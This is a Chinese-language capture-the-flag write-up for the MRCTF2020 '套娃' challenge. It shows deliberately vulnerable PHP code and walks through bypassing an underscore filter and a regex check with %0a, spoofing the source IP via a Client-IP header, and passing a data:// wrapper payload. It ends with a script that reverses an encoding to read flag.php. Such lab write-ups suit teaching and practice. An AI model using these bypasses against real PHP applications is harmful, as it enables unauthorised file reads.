[MRCTF2020]套娃 (buu)

代码：

<?php
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
?>

 

第一个if对下划线和url编码之后的下划线进行了过滤

绕过方法：

1、%20

2、 .

 

b_u_p_t内容需要等于23333，但是preg_match匹配了23333。这个时候需要加上%0a（换行符）绕过preg_match中的$。

提示 secrettw.php，进去之后查看代码发现了一串jsfuck编码

随便post传入一个Merak参数，然后显示了代码：

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 
function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?> 

 

需要满足ip地址为127.0.0.1，并且用file_get_contents打开get传入的2333参数，

ip地址可以用Client-IP伪造，然后通过伪协议data读文件，不知道伪协议php://input有没有效

?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=flag.php

得到了一串字符     ~X��"     ，这个时候需要将解密一下change函数，将参数传入change函数之后的内容为flag.php

 

payload：

<?php 
function rechange($v){
    $re = '';
    for($i=0;$i<strlen($v);$i++){
        $re .= chr (ord($v[$i])-$i*2);
    }
    return $re;
}
echo base64_encode(rechange('flag.php'));

?>

 

 

 

 

 

.